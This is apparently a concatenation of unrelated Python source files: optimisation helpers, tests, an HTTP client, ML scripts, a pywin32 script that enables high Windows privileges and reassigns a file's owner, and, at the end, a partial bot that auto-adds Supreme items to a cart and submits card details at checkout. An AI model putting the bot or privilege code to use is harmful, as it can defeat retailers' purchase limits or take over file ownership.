    mutated = population + k * (population[parents[:, 0]] - population)
mutated += f * (population[parents[:, 1]] - population[parents[:, 2]])
return keep_bounds(mutated, bounds)
def current_to_pbest_weighted_mutation(population: np.ndarray,
population_fitness: np.ndarray,
f: np.ndarray,
f_w: np.ndarray,
p: float,
bounds: np.ndarray) -> np.ndarray:
"""
Calculates the mutation of the entire population based on the
"current to p-best weighted" mutation. This is
    V_{i, G} = X_{i, G} + F_w * (X_{p_best, G} - X_{i, G}) + F * (X_{r1, G} - X_{r2, G})
:param population: Population to apply the mutation
:type population: np.ndarray
:param population_fitness: Fitness of the given population
:type population_fitness: np.ndarray
:param f: Parameter of control of the mutation. Must be in [0, 2].
:type f: np.ndarray
:param f_w: NumPy Array with the weighted version of the mutation array
:type f_w: np.ndarray
    :param p: Percentage of population that can be a p-best. Must be in (0, 1).
:type p: Union[int, float]
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype: np.ndarray
:return: Mutated population
"""
# If there's not enough population we return it without mutating
if len(population) < 4:
return population
# 1. We find the best parent
best_index = np.argsort(population_fitness)[:max(2, round(p*len(population)))]
p_best = np.random.choice(best_index, len(population))
# 2. We choose two random parents
parents = __parents_choice(population, 2)
mutated = population + f_w * (population[p_best] - population)
mutated += f * (population[parents[:, 0]] - population[parents[:, 1]])
return keep_bounds(mutated, bounds)
def crossover(population: np.ndarray, mutated: np.ndarray,
cr: Union[int, float]) -> np.ndarray:
"""
Crosses gens from individuals of the last generation and the mutated ones
based on the crossover rate. Binary crossover
:param population: Previous generation population.
:type population: np.ndarray
:param mutated: Mutated population.
:type population: np.ndarray
:param cr: Crossover rate. Must be in [0,1].
:type population: Union[int, float]
:rtype: np.ndarray
:return: Current generation population.
"""
chosen = np.random.rand(*population.shape)
j_rand = np.random.randint(0, population.shape[1])
chosen[j_rand::population.shape[1]] = 0
return np.where(chosen <= cr, mutated, population)
def exponential_crossover(population: np.ndarray, mutated: np.ndarray,
cr: Union[int, float]) -> np.ndarray:
"""
Crosses gens from individuals of the last generation and the mutated ones
based on the crossover rate. Exponential crossover.
:param population: Previous generation population.
:type population: np.ndarray
:param mutated: Mutated population.
:type population: np.ndarray
:param cr: Crossover rate. Must be in [0,1].
:type population: Union[int, float]
:rtype: np.ndarray
:return: Current generation population.
"""
    if isinstance(cr, (int, float)):
cr = np.array([cr] * len(population))
else:
cr = cr.flatten()
def __exponential_crossover_1(x: np.ndarray, y: np.ndarray, cr: Union[int, float]) -> np.ndarray:
z = x.copy()
n = len(x)
k = np.random.randint(0, n)
j = k
l = 0
while True:
z[j] = y[j]
j = (j + 1) % n
l += 1
            if np.random.rand() >= cr or l == n:
return z
return np.array([__exponential_crossover_1(population[i], mutated[i], cr.flatten()[i]) for i in range(len(population))])
def selection(population: np.ndarray, new_population: np.ndarray,
fitness: np.ndarray, new_fitness: np.ndarray,
return_indexes: bool=False) -> Union[np.ndarray, Tuple[np.ndarray, np.ndarray]]:
"""
Selects the best individuals based on their fitness.
:param population: Last generation population.
:type population: np.ndarray
:param new_population: Current generation population.
:type new_population: np.ndarray
:param fitness: Last generation fitness.
:type fitness: np.ndarray
:param new_fitness: Current generation fitness
:param return_indexes: When active the function also returns the individual indexes that have been modified
:type return_indexes: bool
:rtype: ndarray
    :return: For each position, the better of the previous-generation individual
    and the new one; optionally, also the indexes that were replaced.
"""
indexes = np.where(fitness > new_fitness)[0]
population[indexes] = new_population[indexes]
if return_indexes:
return population, indexes
else:
return population
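# End-to-end sketch (not part of the original module): a plain DE/rand/1/bin
# loop assembled from the helpers above, minimising the sphere function.
# Population size, F, CR and the generation count are illustrative choices.
def _demo_differential_evolution(generations: int = 100) -> np.ndarray:
    def sphere(individual: np.ndarray) -> float:
        return float(np.sum(individual ** 2))

    bounds = np.array([[-5.0, 5.0]] * 10)
    population = init_population(population_size=20, individual_size=10, bounds=bounds)
    fitness = apply_fitness(population, sphere, None)
    for _ in range(generations):
        mutated = binary_mutation(population, f=0.8, bounds=bounds)
        trial = crossover(population, mutated, cr=0.9)
        trial_fitness = apply_fitness(trial, sphere, None)
        population = selection(population, trial, fitness, trial_fitness)
        fitness = np.minimum(fitness, trial_fitness)  # fitness of the survivors
    return population[np.argmin(fitness)]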
|
503172 | fname = r"h:\tmp.txt"
import win32security, win32file, win32api, ntsecuritycon, win32con
new_privs = (
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SHUTDOWN_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TAKE_OWNERSHIP_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", "SeEnableDelegationPrivilege"),
win32con.SE_PRIVILEGE_ENABLED,
), ##doesn't seem to be in ntsecuritycon.py ?
)
ph = win32api.GetCurrentProcess()
th = win32security.OpenProcessToken(
ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES
)
win32security.AdjustTokenPrivileges(th, 0, new_privs)
all_security_info = (
win32security.OWNER_SECURITY_INFORMATION
| win32security.GROUP_SECURITY_INFORMATION
| win32security.DACL_SECURITY_INFORMATION
| win32security.SACL_SECURITY_INFORMATION
)
sd = win32security.GetFileSecurity(fname, all_security_info)
old_dacl = sd.GetSecurityDescriptorDacl()
old_sacl = sd.GetSecurityDescriptorSacl()
old_group = sd.GetSecurityDescriptorGroup()
new_sd = win32security.SECURITY_DESCRIPTOR()
print(
"relative, valid, size: ",
new_sd.IsSelfRelative(),
new_sd.IsValid(),
new_sd.GetLength(),
)
my_sid = win32security.GetTokenInformation(th, ntsecuritycon.TokenUser)[0]
tmp_sid = win32security.LookupAccountName("", "tmp")[0]
new_sd.SetSecurityDescriptorSacl(1, old_sacl, 1)
new_sd.SetSecurityDescriptorDacl(1, old_dacl, 1)
new_sd.SetSecurityDescriptorOwner(tmp_sid, 0)
new_sd.SetSecurityDescriptorGroup(old_group, 0)
win32security.SetFileSecurity(fname, all_security_info, new_sd)
|
503188 | from typing import Set, Type
from arrakisclient.types.namespace import ArrakisNamespace, Relation
class ReferenceableNamespace(ArrakisNamespace):
ellipsis = Relation(relation_name="...")
class User(ReferenceableNamespace):
__namespace__ = "testtenant/user"
class UserGroup(ArrakisNamespace):
__namespace__ = "testtenant/usergroup"
admin = Relation(User)
member = Relation(User)
class ViewableEditable(ArrakisNamespace):
view = Relation(UserGroup)
edit = Relation(UserGroup)
class Deletable(ArrakisNamespace):
delete = Relation(UserGroup)
class Document(ViewableEditable, Deletable):
__namespace__ = "testtenant/document"
def relations(ns: Type[ArrakisNamespace]) -> Set[str]:
return {rel.relation_name for rel in ns.__relations__}
def test_inherited_relations():
assert "..." in relations(User)
assert "admin" in relations(UserGroup)
assert "member" in relations(UserGroup)
assert "view" in relations(Document)
assert "edit" in relations(Document)
assert "delete" in relations(Document)
def test_relation_parent_class():
assert "User" == User.ellipsis.parent_class_name
assert "ViewableEditable" == ViewableEditable.view.parent_class_name
assert "Document" == Document.delete.parent_class_name
|
503195 | import time
from typing import Optional, Union, Dict, Any, List
from algoliasearch.exceptions import AlgoliaUnreachableHostException, RequestException
from algoliasearch.http.hosts import Host
from algoliasearch.http.request_options import RequestOptions
from algoliasearch.configs import Config
from algoliasearch.http.serializer import QueryParametersSerializer, DataSerializer
from algoliasearch.http.verb import Verb
try:
from algoliasearch.http.requester import Requester
except ImportError: # Already imported.
pass
class Transporter(object):
def __init__(self, requester, config):
# type: (Requester, Config) -> None
self._requester = requester
self._config = config
self._retry_strategy = RetryStrategy()
def write(self, verb, path, data, request_options):
# type: (str, str, Optional[Union[dict, list]], Optional[Union[dict, RequestOptions]]) -> dict # noqa: E501
if request_options is None or isinstance(request_options, dict):
request_options = RequestOptions.create(self._config, request_options)
timeout = request_options.timeouts["writeTimeout"]
hosts = self._config.hosts.write()
return self.request(verb, hosts, path, data, request_options, timeout)
def read(self, verb, path, data, request_options):
# type: (str, str, Optional[Union[dict, list]], Optional[Union[dict, RequestOptions]]) -> dict # noqa: E501
if request_options is None or isinstance(request_options, dict):
request_options = RequestOptions.create(self._config, request_options)
timeout = request_options.timeouts["readTimeout"]
hosts = self._config.hosts.read()
return self.request(verb, hosts, path, data, request_options, timeout)
def request(self, verb, hosts, path, data, request_options, timeout):
# type: (str, List[Host], str, Optional[Union[dict, list]], RequestOptions, int) -> dict # noqa: E501
if isinstance(data, dict):
data.update(request_options.data)
query_parameters = dict(request_options.query_parameters)
if verb == Verb.GET:
query_parameters.update(request_options.data)
relative_url = "{}?{}".format(
path, QueryParametersSerializer.serialize(query_parameters)
)
request = Request(
verb.upper(),
request_options.headers,
data,
self._config.connect_timeout,
timeout,
self._config.proxies,
)
return self.retry(hosts, request, relative_url)
def retry(self, hosts, request, relative_url):
# type: (List[Host], Request, str) -> dict
for host in self._retry_strategy.valid_hosts(hosts):
request.url = "https://{}/{}".format(host.url, relative_url)
response = self._requester.send(request)
decision = self._retry_strategy.decide(host, response)
if decision == RetryOutcome.SUCCESS:
return response.content if response.content is not None else {}
elif decision == RetryOutcome.FAIL:
content = response.error_message
if response.content and "message" in response.content:
content = response.content["message"]
raise RequestException(content, response.status_code)
raise AlgoliaUnreachableHostException("Unreachable hosts")
def close(self):
# type: () -> None
self._requester.close()
class Request(object):
def __init__(
self, verb, headers, data, connect_timeout, timeout, proxies={}
): # noqa: E501
# type: (str, dict, Optional[Union[dict, list]], int, int, dict) -> None # noqa: E501
self.verb = verb
self.data = data
self.data_as_string = "" if data is None else DataSerializer.serialize(data)
self.headers = headers
self.connect_timeout = connect_timeout
self.timeout = timeout
self.proxies = proxies
self.url = ""
def __str__(self):
return "Request({}, {}, {}, {}, {}, {}, {})".format(
self.verb,
self.url,
self.headers,
self.data_as_string,
self.connect_timeout,
self.timeout,
self.proxies,
)
def __repr__(self):
return self.__str__()
def __eq__(self, other):
# type: (object) -> bool
return self.__dict__ == other.__dict__
class Response(object):
def __init__(
self,
status_code=None,
content=None,
error_message="",
is_timed_out_error=False,
is_network_error=False,
):
# type: (int, Optional[Dict[str, Any]], str, bool, bool) -> None
self.status_code = status_code
self.content = content
self.error_message = error_message
self.is_timed_out_error = is_timed_out_error
self.is_network_error = is_network_error
class RetryStrategy(object):
def valid_hosts(self, hosts):
# type: (list) -> list
for host in hosts:
if not host.up and self._now() - host.last_use > Host.TTL:
host.up = True
return [host for host in hosts if host.up]
def _now(self):
# type: () -> float
return time.time()
def decide(self, host, response):
# type: (Host, Response) -> str
host.last_use = time.time()
if response.is_timed_out_error:
host.retry_count += 1
return RetryOutcome.RETRY
elif self._is_retryable(response):
host.up = False
return RetryOutcome.RETRY
elif response.status_code is not None and self._is_success(response):
return RetryOutcome.SUCCESS
return RetryOutcome.FAIL
def _is_success(self, response):
# type: (Response) -> bool
return response.status_code is not None and (response.status_code // 100) == 2
def _is_retryable(self, response):
# type: (Response) -> bool
if response.is_network_error:
return True
return (
response.status_code is not None
and (response.status_code // 100) != 2
and (response.status_code // 100) != 4
)
class RetryOutcome(object):
SUCCESS = "SUCCESS"
RETRY = "RETRY"
FAIL = "FAIL"
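# Decision sketch for RetryStrategy.decide (synthetic Response objects, not
# real HTTP traffic):
#
#     decide(host, Response(status_code=200, content={}))          -> SUCCESS
#     decide(host, Response(is_timed_out_error=True))              -> RETRY  (host.retry_count += 1)
#     decide(host, Response(status_code=503,
#                           error_message='Service Unavailable'))  -> RETRY  (host marked down)
#     decide(host, Response(status_code=404,
#                           error_message='Not Found'))            -> FAIL   (Transporter raises RequestException)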
|
503203 | import sys
sys.setrecursionlimit(2000000000)  # NOTE: CPython can overflow the C stack long before this depth
def factoring(n, lst, count):
if (count > n):
print "The factors are", lst
elif (n % count == 0):
lst.append(count)
print "list is", lst
factoring(n, lst, count+1)
else:
factoring(n, lst, count+1)
k = [1]
factoring(472822,k,2) |
503207 | import torch
import sys
_, a, b = sys.argv
x, y = torch.load(a), torch.load(b)
x, y = x.squeeze(), y.squeeze()
x = x / x.norm(dim = -1, keepdim = True)
y = y / y.norm(dim = -1, keepdim = True)
x = x[:1203]
y = y[:1203]
sim = (x*y).sum(dim=-1)
print(sim)
print(sim.mean()) |
503224 | import numpy as np
from astropy import units as u
from ..cube import SEDCube
def test_roundtrip(tmpdir):
n_models = 30
n_ap = 3
n_wav = 10
s = SEDCube()
s.names = ['name_{0:02d}'.format(i) for i in range(n_models)]
s.apertures = np.linspace(10, 100, n_ap) * u.au
s.wav = np.linspace(0.01, 5000, n_wav)[::-1] * u.micron
s.distance = 1. * u.kpc
s.val = np.random.random((n_models, n_ap, n_wav)) * u.mJy
s.unc = np.random.random((n_models, n_ap, n_wav)) * u.mJy
temp_file = tmpdir.join('test_roundtrip_sedcube').strpath
s.write(temp_file)
s2 = SEDCube.read(temp_file)
assert s == s2
def test_roundtrip_missing_optional(tmpdir):
n_models = 30
n_wav = 10
s = SEDCube()
s.names = ['name_{0:02d}'.format(i) for i in range(n_models)]
s.wav = np.linspace(0.01, 5000, n_wav)[::-1] * u.micron
s.distance = 1. * u.kpc
s.val = np.random.random((n_models, 1, n_wav)) * u.mJy
temp_file = tmpdir.join('test_roundtrip_sedcube').strpath
s.write(temp_file)
s2 = SEDCube.read(temp_file)
assert s == s2
|
503234 | from requests.exceptions import ConnectionError
class MediaWikiError(Exception):
"""
Raised when the MediaWiki API returns an error.
"""
def __init__(self, message, errors):
super(MediaWikiError, self).__init__(message)
self.errors = errors
class LoopException(Exception):
"""
Raised when a loop is detected.
"""
pass
class InvalidPageNameError(Exception):
"""
Raised when an invalid page name is
passed to trace().
"""
pass
class LinkNotFoundError(Exception):
"""
Raised when no valid link is found
after parsing.
"""
pass
|
503296 | import ast
from sklearn.preprocessing import LabelEncoder
from keras.preprocessing import sequence
import numpy as np
from keras.models import load_model
from optparse import OptionParser
from keras.layers import Average, Input
from keras.models import Model
def toEvaluationFormat(all_doc_ids, all_prediction):
evaluationFormatList = []
for i in range(len(all_doc_ids)):
current_doc_id = all_doc_ids[i]
current_prob = all_prediction[i][0]
#current_prob = all_prediction[i]
if current_prob > 0.5:
current_pred = 'true'
else:
current_prob = 1 - current_prob
current_pred = 'false'
evaluationFormat = str(current_doc_id) + ' ' + str(current_pred) + ' ' + str(current_prob) + '\n'
evaluationFormatList.append(evaluationFormat)
return evaluationFormatList
def load_data(data_path, max_len=200):
data = []
l = []
ids = []
i = 0
l_encoder = LabelEncoder()
with open(data_path, 'rb') as inf:
for line in inf:
gzip_fields = line.decode('utf-8').split('\t')
gzip_id = gzip_fields[0]
gzip_label = gzip_fields[1]
elmo_embd_str = gzip_fields[4].strip()
elmo_embd_list = ast.literal_eval(elmo_embd_str)
elmo_embd_array = np.array(elmo_embd_list)
padded_seq = sequence.pad_sequences([elmo_embd_array], maxlen=max_len, dtype='float32')[0]
data.append(padded_seq)
l.append(gzip_label)
ids.append(gzip_id)
i += 1
print(i)
label = l_encoder.fit_transform(l)
return np.array(data), np.array(label), np.array(ids)
def ensemble(models,model_input):
outputs = [model(model_input) for model in models]
y = Average()(outputs)
model = Model(model_input, y, name='ensemble')
return model
parser = OptionParser()
parser.add_option("--inputTSV", help="load saved cache", type=str)
parser.add_option("--output", help="load saved cache", type=str)
parser.add_option("--saved_model1", help="load saved cache", type=str)
parser.add_option("--saved_model2", help="load saved cache", type=str)
parser.add_option("--saved_model3", help="load saved cache", type=str)
options, arguments = parser.parse_args()
max_len = 200
embed_size = 1024
seed = 7
x_data, y_data, doc_id = load_data(options.inputTSV,max_len=max_len)
model1 = load_model(options.saved_model1)
model1.name = 'model1'
model2 = load_model(options.saved_model2)
model2.name = 'model2'
model3 = load_model(options.saved_model3)
model3.name = 'model3'
models = [model1, model2, model3]
print(models[0].input_shape[1:])
model_input = Input(shape=models[0].input_shape[1:], dtype='float32')
ensemble_models = ensemble(models,model_input)
pred = ensemble_models.predict(x_data)
all_pred = toEvaluationFormat(doc_id, pred)
with open(options.output, 'w') as fo:
for item in all_pred:
fo.write(item)
|
503303 | from .scope import scope
from .BaseScope import BaseScope
from .SoftDeletesMixin import SoftDeletesMixin
from .SoftDeleteScope import SoftDeleteScope
from .TimeStampsMixin import TimeStampsMixin
from .TimeStampsScope import TimeStampsScope
from .UUIDPrimaryKeyScope import UUIDPrimaryKeyScope
from .UUIDPrimaryKeyMixin import UUIDPrimaryKeyMixin
|
503326 | import datetime
import pytz
from django.utils import timezone
from connect.moderation.models import ModerationLogMsg
def log_moderator_event(msg_type, user, moderator, comment=''):
"""
Log a moderation event.
"""
message = ModerationLogMsg.objects.create(
msg_type=msg_type,
comment=comment,
pertains_to=user,
logged_by=moderator,
)
return message
def get_date_limits(start_date, end_date=None):
"""
Return first and last UTC moments of given date(s),
to the nearest microsecond.
`start_date` and `end_date` must be aware datetime objects.
If only one date is specified, the first and last moments of this date
will be returned.
"""
if not end_date:
end_date = start_date
start_date_tz = start_date.tzinfo
end_date_tz = end_date.tzinfo
start = datetime.datetime.combine(start_date, datetime.time.min)
start_local = timezone.make_aware(start, start_date_tz)
start_utc = start_local.astimezone(pytz.UTC)
end = datetime.datetime.combine(end_date, datetime.time.max)
end_local = timezone.make_aware(end, end_date_tz)
end_utc = end_local.astimezone(pytz.UTC)
return (start_utc, end_utc)
|
503332 | import torch
import os
from argparse import ArgumentParser
from logire import LogiRE, RelationExtractor
from dataset import BackboneDataset, get_backbone_collate_fn
from torch.utils.data import DataLoader
def main():
parser = ArgumentParser()
parser.add_argument('--mode', default='train')
parser.add_argument('--save_dir', default='logire-save')
parser.add_argument('--train_batch_size', type=int, default=4)
parser.add_argument('--test_batch_size', type=int, default=4)
parser.add_argument('--Ns', type=int, default=50, help="size of the latent rule set")
parser.add_argument('--num_epochs', type=int, default=50, help="number of training epochs for the relation extractor")
parser.add_argument('--warmup_ratio', type=float, default=0.06)
parser.add_argument('--rel_num', type=int, default=65, help="number of relation types")
parser.add_argument('--ent_num', type=int, default=10, help='number of entity types')
parser.add_argument('--n_iters', type=int, default=10, help='number of iterations')
parser.add_argument('--max_depth', type=int, default=3, help='max depth of the rules')
parser.add_argument('--data_dir', default='../kbp-benchmarks/DWIE/data/docred-style')
parser.add_argument('--backbone_path', default="data/dwie-atlop.dump")
parser.add_argument('--rule_path', default='data/dwie.grules.json')
args = parser.parse_args()
if args.mode == 'train':
logire = LogiRE(args)
logire.EM_optimization()
elif args.mode == 'test':
logire = LogiRE(args)
dev_ret, test_ret = logire.evaluate_base()
print('#' * 100 + '\n# Evaluating Backbone\n' + '#' * 100)
print('dev ', dev_ret)
print('test', test_ret)
collate_fn = get_backbone_collate_fn(0)
dev_data = BackboneDataset(logire.re_reader.read('dev'), logire.type_masks['dev'], logire.dists['dev'])
dev_loader = DataLoader(dev_data, batch_size=args.test_batch_size, shuffle=False, collate_fn=collate_fn)
test_data = BackboneDataset(logire.re_reader.read('test'), logire.type_masks['test'], logire.dists['test'])
test_loader = DataLoader(test_data, batch_size=args.test_batch_size, shuffle=False, collate_fn=collate_fn)
print('#' * 100 + '\n# Evaluating LogiRE\n' + '#' * 100)
for iter_i in range(args.n_iters + 1):
print('-'*45 + f'Iter {iter_i}' + '-'*50)
save_path = os.path.join(args.save_dir, f'scorer-{iter_i}.pt')
model = RelationExtractor(torch.load(save_path))
dev_ret = logire.evaluate_relation_extractor(model, dev_loader)
print('dev ', dev_ret)
test_ret = logire.evaluate_relation_extractor(model, test_loader, dev_ret['theta'])
print('test', test_ret)
else:
raise ValueError(f'Unknown mode {args.mode}')
if __name__ == "__main__":
main() |
503341 | import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# from core.encoders import *
import json
from torch import optim
from cortex_DIM.nn_modules.mi_networks import MIFCNet, MI1x1ConvNet
from losses import *
class GlobalDiscriminator(nn.Module):
def __init__(self, args, input_dim):
super().__init__()
        # The hidden sizes below are hard-coded for 32-dim summary vectors (the concatenation
        # of y and the encoded M); l2 maps the hidden state to a single score. Note that
        # `self.encoder` used in forward() must be attached to this module externally.
        self.l0 = nn.Linear(32, 32)
        self.l1 = nn.Linear(32, 32)
        self.l2 = nn.Linear(32, 1)
def forward(self, y, M, data):
adj = Variable(data['adj'].float(), requires_grad=False).cuda()
# h0 = Variable(data['feats'].float()).cuda()
batch_num_nodes = data['num_nodes'].int().numpy()
M, _ = self.encoder(M, adj, batch_num_nodes)
# h = F.relu(self.c0(M))
# h = self.c1(h)
# h = h.view(y.shape[0], -1)
h = torch.cat((y, M), dim=1)
h = F.relu(self.l0(h))
h = F.relu(self.l1(h))
return self.l2(h)
class PriorDiscriminator(nn.Module):
def __init__(self, input_dim):
super().__init__()
self.l0 = nn.Linear(input_dim, input_dim)
self.l1 = nn.Linear(input_dim, input_dim)
self.l2 = nn.Linear(input_dim, 1)
def forward(self, x):
h = F.relu(self.l0(x))
h = F.relu(self.l1(h))
return torch.sigmoid(self.l2(h))
class FF(nn.Module):
def __init__(self, input_dim):
super().__init__()
# self.c0 = nn.Conv1d(input_dim, 512, kernel_size=1)
# self.c1 = nn.Conv1d(512, 512, kernel_size=1)
# self.c2 = nn.Conv1d(512, 1, kernel_size=1)
self.block = nn.Sequential(
nn.Linear(input_dim, input_dim),
nn.ReLU(),
nn.Linear(input_dim, input_dim),
nn.ReLU(),
nn.Linear(input_dim, input_dim),
nn.ReLU()
)
self.linear_shortcut = nn.Linear(input_dim, input_dim)
# self.c0 = nn.Conv1d(input_dim, 512, kernel_size=1, stride=1, padding=0)
# self.c1 = nn.Conv1d(512, 512, kernel_size=1, stride=1, padding=0)
# self.c2 = nn.Conv1d(512, 1, kernel_size=1, stride=1, padding=0)
def forward(self, x):
return self.block(x) + self.linear_shortcut(x)
|
503402 | import os
# To import anything we need to add the backend directory into sys.path
import sys
BACKEND_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
if BACKEND_DIR not in sys.path:
sys.path.append(BACKEND_DIR) |
503412 | import sys
from girder_worker.utils import TeeStdOutCustomWrite
def test_TeeStdOutCustomWrite(capfd):
nonlocal_ = {'data': ''}
def _append_to_data(message, **kwargs):
nonlocal_['data'] += message
with TeeStdOutCustomWrite(_append_to_data):
sys.stdout.write('Test String')
sys.stdout.flush()
assert nonlocal_['data'] == 'Test String'
out, err = capfd.readouterr()
assert out == 'Test String'
|
503434 | import os
from unittest import TestCase
import psutil
import glcontext
class ContextTestCase(TestCase):
def test_create(self):
"""Basic context testing"""
# Create a standalone context
# os.environ['GLCONTEXT_WIN_LIBGL'] = 'moo.dll'
        # os.environ['GLCONTEXT_LINUX_LIBGL'] = 'libGL.so.1'
# os.environ['GLCONTEXT_GLVERSION'] = '430'
backend = glcontext.default_backend()
ctx = backend(mode='standalone', glversion=330)
# Ensure methods are present
self.assertTrue(callable(ctx.load))
self.assertTrue(callable(ctx.release))
self.assertTrue(callable(ctx.__enter__))
self.assertTrue(callable(ctx.__exit__))
# Enter and exit context
with ctx:
pass
# Ensure method loading works
ptr = ctx.load('glEnable')
self.assertIsInstance(ptr, int)
self.assertGreater(ptr, 0)
# Load non-existent gl method
# NOTE: Disabled for now since x11 returns positive values
# for non-existent methods
# ptr = ctx.load('bogus')
# self.assertIsInstance(ptr, int)
# self.assertEqual(ptr, 0)
def test_mass_create(self):
"""Create and destroy a large quantity of contexts.
The rss memory usage should not grow more than 5x
after allocating 1000 contexts.
"""
process = psutil.Process(os.getpid())
start_rss = process.memory_info().rss
for i in range(1000):
ctx = glcontext.default_backend()(mode='standalone', glversion=330)
# Ensure we can enter context and load a method as a minimum
with ctx:
self.assertGreater(ctx.load('glBegin'), 0)
ctx.release()
end_rss = process.memory_info().rss
self.assertTrue(end_rss / start_rss < 5.0)
|
503444 | from apscheduler.schedulers.blocking import BlockingScheduler
from multiprocessing.dummy import Pool as ThreadPool
from bs4 import BeautifulSoup as bs
import requests
import timeit
import datetime
import time
import sys
import re
from getconf import *
# TO DO: scrape for early links
# Constants
base_url = 'http://www.supremenewyork.com'
# Inputs
keywords_category = ['shirts'] # Demo stuff, feel free to change
keywords_model = ['mini', 'shadow', 'plaid', 'shirt']
keywords_style = ['blue']
size = 'medium'
use_early_link = False
early_link = ''
# early_link = 'http://www.supremenewyork.com/shop/jackets/nzpacvjtk' #sold out
# early_link = 'http://www.supremenewyork.com/shop/shirts/r1k32vjf4/sblz8csj2' # mult sizes
# early_link = 'http://www.supremenewyork.com/shop/accessories/kcgevis8r/xiot9byq4' #one size
# Functions
def product_page(url):
print('Finding matching products...')
session = requests.Session()
session.headers.update({
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/52.0.2743.116 Safari/537.36',
'X-XHR-Referer': 'http://www.supremenewyork.com/shop/all',
'Referer': 'http://www.supremenewyork.com/shop/all/bags',
'Accept': 'text/html, application/xhtml+xml, application/xml',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.8,da;q=0.6',
'DNT': '1'
})
response = session.get(base_url + url)
soup = bs(response.text, 'html.parser')
h1 = soup.find('h1', {'itemprop': 'name'})
p = soup.find('p', {'itemprop': 'model'})
match = []
if h1 is not None and p is not None:
model = h1.string
style = p.string
for keyword in keywords_model:
if keyword.title() in model:
match.append(1)
else:
match.append(0)
# add to cart
if 0 not in match:
match = []
for keyword in keywords_style:
if keyword.title() in style:
match.append(1)
else:
match.append(0)
if 0 not in match:
print('FOUND: ' + model + ' at ' + base_url + url)
add_to_cart(soup, base_url+url)
else:
                sys.exit("Sorry, couldn't find {} in {}".format(model, style))
def add_to_cart(soup, url):
product_name = soup.find('h1',{'itemprop': 'name'}).string
print('Adding {} to cart...'.format(product_name))
session = requests.Session()
session.headers.update({
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/52.0.2743.116 Safari/537.36',
'X-XHR-Referer': 'http://www.supremenewyork.com/shop/all',
'Referer': 'http://www.supremenewyork.com/shop/all/',
'Accept': 'text/html, application/xhtml+xml, application/xml',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.8,da;q=0.6',
'DNT': '1'
})
form = soup.find('form', {'action': re.compile('(?<=/shop/)(.*)(?=/add)')})
csrf_token = soup.find('meta', {'name': 'csrf-token'})['content']
# find size
sold_out = soup.find('fieldset', {'id': 'add-remove-buttons'}).find('b')
if sold_out is not None:
sys.exit('Sorry, product is sold out!')
else:
if size.upper() == 'OS':
size_value = form.find('input', {'name': 'size'})['value']
else:
try:
size_value = soup.find('option', string=size.title())['value']
except:
sys.exit('Sorry, {} is sold out!'.format(size))
if form is not None:
payload = {
'utf8': '✓',
'authenticity_token': form.find('input', {'name': 'authenticity_token'})['value'],
'size': size_value,
'commit': 'add to cart'
}
headers = {
'Accept': '*/*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript',
'Origin': 'http://www.supremenewyork.com',
'X-Requested-With': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': url,
'X-XHR-Referer': None,
'X-CSRF-Token': csrf_token,
'Accept-Encoding': 'gzip, deflate'
}
session.post(base_url + form['action'], data=payload, headers=headers)
print('Added to cart!')
checkout(session)
else:
sys.exit('Sorry, product is sold out!')
def format_phone(n):
return '({}) {}-{}'.format(n[:3], n[3:6], n[6:])
def format_card(n):
return '{} {} {} {}'.format(n[:4], n[4:8], n[8:12], n[12:])
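# Hedged examples of the two formatters above (digit strings are made up):
#   format_phone('5551234567')        -> '(555) 123-4567'
#   format_card('4111111111111111')   -> '4111 1111 1111 1111'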
def checkout(session):
print('Filling out checkout info...')
response = session.get('https://www.supremenewyork.com/checkout')
soup = bs(response.text, 'html.parser')
form = soup.find('form', {'action': '/checkout'})
csrf_token = soup.find('meta', {'name': 'csrf-token'})['content']
headers = {
'Accept': 'text/html, */*; q=0.01',
'X-CSRF-Token': csrf_token,
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.supremenewyork.com/checkout',
'Accept-Encoding': 'gzip, deflate, sdch, br'
}
country_abbrv = shipping_country_abbrv
if country_abbrv == 'US':
country_abbrv = 'USA'
payload = {
'utf8': '✓',
'authenticity_token': form.find('input', {'name': 'authenticity_token'})['value'],
'order[billing_name]': first_name + ' ' + last_name,
'order[email]': email,
'order[tel]': format_phone(phone_number),
'order[billing_address]': shipping_address_1,
'order[billing_address_2]': shipping_apt_suite,
'order[billing_zip]': shipping_zip,
'order[billing_city]': shipping_city,
'order[billing_state]': shipping_state,
'order[billing_country]': country_abbrv,
'same_as_billing_address': '1',
'store_credit_id': '',
'credit_card[type]': card_type,
'credit_card[cnb]': format_card(card_number),
'credit_card[month]': card_exp_month,
'credit_card[year]': card_exp_year,
'credit_card[vval]': card_cvv,
'order[terms]': '1',
'hpcvv': '',
'cnt': '2'
}
response = session.get('https://www.supremenewyork.com/checkout.js', data=payload, headers=headers)
payload = {
'utf8': '✓',
'authenticity_token': form.find('input', {'name': 'authenticity_token'})['value'],
'order[billing_name]': first_name + ' ' + last_name,
'order[email]': email,
